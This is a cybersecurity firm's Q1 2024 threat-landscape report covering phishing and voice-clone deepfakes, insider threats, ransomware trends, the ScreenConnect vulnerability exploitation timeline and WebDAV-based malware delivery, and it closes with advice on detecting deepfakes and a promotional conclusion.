Authors
Laurie Iacono, George Glass, Keith Wojcieszek
Report Copy
In Q1 2024, we saw an evolution in techniques used by attackers, some of which may point to longer term trends in the variation and sophistication of attacks faced by organizations. In particular, with regards to phishing, we saw SMS and voice-based tactics being used, which raises concern around the potential for deep fakes and AI-type technologies to further enhance the effectiveness of phishing attacks.
In the same vein, one insider threat case investigated by Kroll this quarter saw employee impersonation take place, another area where AI-type technology could be especially effective. Additionally this quarter, Kroll’s investigation into the ScreenConnect CVE shows attackers getting faster in their exploitation of CVEs.
Two industries are the focus in Q1 2024: technology/telecoms and construction. The former saw significant growth in insider threat cases, potentially a result of increased supply chain risk. The latter saw steady growth in email compromise over the past year, which could be driven by the nature of work in this industry, meaning that employees are often working via mobile devices or on site, where they may be more susceptible to attack.
Q1 2024 Threat Timeline
January
- Two zero-day vulnerabilities identifiedin Ivanti Connect Secure and Ivanti Policy Secure Gateways.
- AKIRA ransomware tactics, techniques and procedures (TTPs) evolve, with threat actors targeting companies with vulnerable interfacing Cisco ASA or FTD devices, then wiping those companies’ backups before deploying the ransomware.
February
- Kroll identified critical vulnerabilities in ConnectWise ScreenConnect that allowed for authentication bypass and remote code execution.
- The LOCKBIT ransomware group has their operation disrupted by law enforcementwith the takedown of their data leak site, 34 servers and account closures. Law enforcement officials also obtain decryption keys and make two arrests.
- LOCKBIT returns towards the end of the month with new encryptors and servers for attacks, as well as an updated ransom note.
- Change Healthcare is hit by a cybersecurity incident. Numerous healthcare organizations report major outages due to the attack.
March
- KTA248 begins a campaign of PIKABOT distribution via email and another campaign that attempts to exfiltrate NTLMv2 hashes from victim environments.
- BLACKCAT shuts off their servers amid claims that they exit scammed, allegedly faking the law enforcement seizure posted on their Tor site to avoid sharing a new ransom payment with their affiliates.
Sector Analysis—Professional Services Continues to be Top Target
Most Targeted Industry by Sector Over the Past Three Quarters
The sectors targeted by threat actors in Q1 2024 were consistent with previous quarters. Professional services remained the focus for attacks, accounting for 24% of cases, while manufacturing continued to rank at second place, with 13% of cases, followed by financial services and health care at 9% and 8% respectively.
Sector Spotlight: Business Email Compromise Becomes an Issue for Construction Industry
Incident Response Cases in the Construction Industry Over the Past Five Quarters
Q1 2024 Construction Sector—Threat Incident Types
In Q1 2024, attacks against the construction sector accounted for nearly 6% of all Kroll incident response engagements. This was double the sector’s peak of 3% in Q1 2023. Attacks against the construction sector are most likely to be some form of business email compromise (BEC). A review of cases indicates that carefully crafted phishing lures designed to mirror document-signing programs are a common way to socially engineer victims into giving up their credentials and, in some cases, their multi-factor authentication (MFA) prompts using an attacker-in-the-middle methodology.
Construction firms may be targeted in this way for several different purposes. One is for financial gain, as a result of social engineering campaigns that redirect vendor payments to a fraudulent bank account.
In other cases, the construction company is used as the pivot point for downstream attacks. In these cases, actors use unauthorized access to a user’s email inbox to phish other clients. For example, sending out fake requests for document signature to multiple vendors to gain credentials from those vendors and extend their victim access.
The reason for these rising attacks may be because the industry involves many digital sign-ins via mobile devices on sites. An employee may be more likely to fall for a phishing lure if they are receiving the email on the road, making them potentially less vigilant about the signs of a fraudulent email.
Threat Incident Types: Variation in Phishing Techniques Signals an Evolution in Tactics
Most Popular Threat Incident Types—Past Three Quarters
In Q1 2024, Kroll observed a slight increase in email compromise, with it remaining the most common type of threat incident. Interestingly, the percentage of ransomware cases declined in Q1, potentially as a result of disruptions affecting the large ransomware-as-a-service variants such as LockBit and BlackCat.
Phishing was the most likely vector for email compromise incidents. Kroll observed that in Q1, while phishing was typically synonymous with an email message, actors continued to evolve tactics and introduce other tactics, such as SMS lures and voice phishing, which seem to be rising in popularity.
For many firms, security controls put into place to decrease the likelihood of BEC attacks include the verbal authentication of C-level personnel (such as chief executive or financial officers). Despite the fact that these were intended to add an extra layer of authentication for requests undertaken strictly through email, Kroll has observed cases in which actors are likely using commonly available deep fake tools to clone the voices of CEOs and CFOs.
Case Study: Evidence of Voice Cloning Highlight Risk of Deep Fakes
In one such case, Kroll noted repeated voicemail messages simulating the CEO’s voice to authorize fraudulent transactions. The messages were upwards of five minutes long, potentially to increase the likelihood of the scam being actioned. While employees may be more suspicious of a short message cloning the CEO’s voice, a longer message—which leverages publicly available voice recordings of the CEO—arguably seems more legitimate. Such attempts highlight the increased risk that deep fakes and other AI-type technologies pose to organizations.
Technology and Telecoms Industry Most Susceptible to Insider Threat, Highlighting Threat of Supply Chain Attacks
Q1 2024—Insider Threat Incidents by Sector
A review of Kroll engagements for insider threat revealed insights into the sectors most vulnerable to such attacks. In Q1, Kroll observed that cases impacting the technology/telecom sector were most likely to be insider threat cases. With most technology providers working with multiple downstream customers, an insider with access to multiple technology providers may have the ability to cascade malicious activity to clients, posing the risk of a supply chain attack.
For the first time, we also split out the proportion of insider threat engagements deemed to be intentional versus those deemed to be unintentional. In 90% of cases, Kroll observes the insider threat being intentional, and therefore arguably malicious in intent, as opposed to accidental. This highlights the importance of insider threat not being overlooked as a threat incident type by companies.
Case Study: Employee Impersonation Insider Threat
In one case observed by Kroll in Q1, an employee onboarded by a third-party contracting firm began displaying suspicious behavior. The employee, who had been given access to confidential and sensitive information due to their job role, frequently delayed communication and stopped communicating altogether once more serious questions were raised about the legitimacy of his identity.
In this case, Kroll was able to help the company identify that the employed individual was accessing the network from a different country to the one they claimed to reside in. Kroll also helped identify the data at risk associated with the employee.
Although Kroll did not observe the use of deep fake technology in enhancing the employee impersonation, this case does highlight how sophisticated AI technology could result in more convincing campaigns of this type.
Ransomware Variants Q1 2024
Top 10 Ransomware Variants Q1 2024
The AKIRA ransomware group took the lead in Q1 2024 with 27% of cases and LOCKBIT slipped into second place with 15% of cases. We also saw a significant drop in PLAY ransomware group activity, from 11% of cases in Q4 2023 to 5% in Q1 2024.
Phishing Dominates Initial Access Methods
Top 4 Initial Access Methods—Past Three Quarters
Phishing remained the top initial access vector across all threat incident types. For events where phishing was the main initial access vector, the threat type was most likely to be email compromise.
Kroll continued to observe an increase in attacks that began with a social engineering nexus and observed increases for incidents that started with threat actors exploiting public-facing applications, such as Cisco’s Adaptive Security Appliance (ASA) virtual private networks and ScreenConnect remote management tools. Attacks targeting known vulnerabilities were most likely to result in a ransomware incident.
Initial Access Spotlight: ScreenConnect CVE Exploited in Less Than 48 Hours by Range of Threat Actor Types
On February 19, software firm ConnectWise notified clients of two vulnerabilities (CVE-2024-1708 and CVE-2024-1709) impacting on-premise versions of their remote management tool, ScreenConnect (versions 23.9.7 and prior). The CVEs could allow attackers to bypass authentication measures to create administrative level accounts. Once those admin accounts are created, attackers would have system administrator level privileges.
In the immediate aftermath of the publication, Kroll responded to many engagements where attackers exploited this vulnerability to behave maliciously in victim’s networks. On the managed detection and response (MDR) side, Kroll was able to identify and quarantine exploitation activity before it progressed to a full-blown incident. In at least one case, Kroll identified a file containing a new malware, TODDLERSHARK, related to the Kimsuky threat actor group.
On the incident response side, Kroll observed that a majority of its ScreenConnect cases had an initial access date of February 21, indicating that actors were exploiting the vulnerability within less than 48 hours of the original announcement.
Based on a review of these cases, Kroll observed a wide range of threat actors leveraging the vulnerability.
In Kroll’s review, cases occurring within the first five days of the publication were more likely to be associated with larger-scale threat actor groups. Three weeks on from the publication date, fewer cases were observed, likely due to widespread patching. Cases observed during this time period were more likely to be associated with lone wolf actors or less sophisticated threat actor groups.
Malware Trends and Analysis
Kroll actively tracks malware C2 infrastructure, submissions to public sandboxes and active incident response (IR) and MDR case data to generate lists of the most active malware strains for comparison. In Q1, the most notable changes were a drop in activity from QAKBOT and PIKABOT. Kroll’s Cyber Threat Intelligence team believes that this is due to a shift in KTA248 behavior toward other malware strains, such as ICEDID and ICENOVA.
Top 10 Malware Strains—Q1 2024
In Q1, Kroll observed an uptick in threat actors leveraging WebDAV for use with remote file access for Windows. WebDAV is a protocol that allows a standard way for users and web services to communicate over the Hypertext Transfer Protocol (HTTP) to create, modify and move documents. WebDAV offers the ability for multiple users to work simultaneously on the same content.
Kroll observed actors leveraging vulnerabilities in Microsoft SmartScreen software (CVE-2023-36025 and CVE-2024-21412) that allow attackers to send an internet shortcut with an embedded malicious URL that is designed to bypass security controls. Kroll observed multiple campaigns using the technique to distribute multiple malware variants, including TIMBERSTEALER, DARKME, DARKGATE and ICENOVA (LATRODECTUS).
WebDAV has a long history of security issues, particularly when associated with Windows file-sharing technologies. Previously, we have seen issues such as the leaking of user New Technology Lan Manager (NTLM) hashes and now more recently, SmartScreen bypass vulnerabilities. These vulnerabilities aren’t the only reason WebDAV is attractive to an attacker. Due to its integration into Windows, it is harder to detect than a suspicious process making its own connections. This is because with WebDAV, it is often the case that Windows file sharing is owning the actual network interaction, and the malicious process is ostensibly accessing a file. WebDAV also provides an attacker with a simple means of remote file transfer with minimal code, as even a basic batch script can download a file with a copy command. It is recommended where possible to block WebDAV traffic at the perimeter.
Recommendations for Detecting Deepfakes
One of the most effective mitigations against deepfakes and AI-type attacks is to improve detections, and security teams should have this as part of their training.
For pre-recorded deepfakes:
- The video sender’s address is often spoofed or unknown.
- Investigative reverse image searches can often be used in poorer quality and mass produced deepfake videos for detection.
For live deepfakes:
- The individual can be asked to make extensive movements to test for discoloration, abnormal body shapes, distorted limbs and irregular hair flickering.
- A policy whereby standard movement protocols must be followed to avoid deepfake scenarios. If this is part of regular compliance procedures, it avoids awkwardness during implementation.
For AI-enabled deepfakes:
- Detection models should be trained on individuals, rather than generically trying to identify deepfakes.
Evolving Threats and Tactics Signal Need for Breadth of Cyber Protection
Kroll’s findings for the first quarter of 2024 highlight the value of a broad cyber protection strategy for organizations. From familiar security foes—such as malware to the evolution of newer ones, like deepfakes—trends observed throughout the quarter prove that cyber threats of many types are now very much the norm rather than the exception for many industries. Organizations need a cyber strategy that can guide them from building resilience to these varied threats, to threat hunting and detection, through to complete response and recovery.
The increase in insider threats noted this quarter means that businesses must ensure they are prepared to tackle the threat from within, as well as addressing increasingly varying types of external risks. At a time when vulnerabilities are exploited by attackers ranging in scale from nation states to solo actors, the threat landscape is becoming increasingly complex to navigate. As threat actors continue to leverage innovative approaches to attack, so too must organizations in response. Faced by the growing AI challenge, organizations can no longer risk relying on purely defensive or one-dimensional approaches to security. Instead, they must ensure that their vigilance translates into a strategy that proactively addresses all layers of the attack surface.
With AI, deepfake tech, SMS lures and other technology highly likely to provide even more opportunities for threat actors in the near future, companies need to be vigilant in building a comprehensive cyber protection strategy. Adapting in this climate means collaborating with a security partner capable of scaling up and with the breadth of vision and solutions to ensure that organizations can stay ahead at every stage of the threat lifecycle. Only by doing so can companies ensure they remain resilient in the face of formidable security challenges.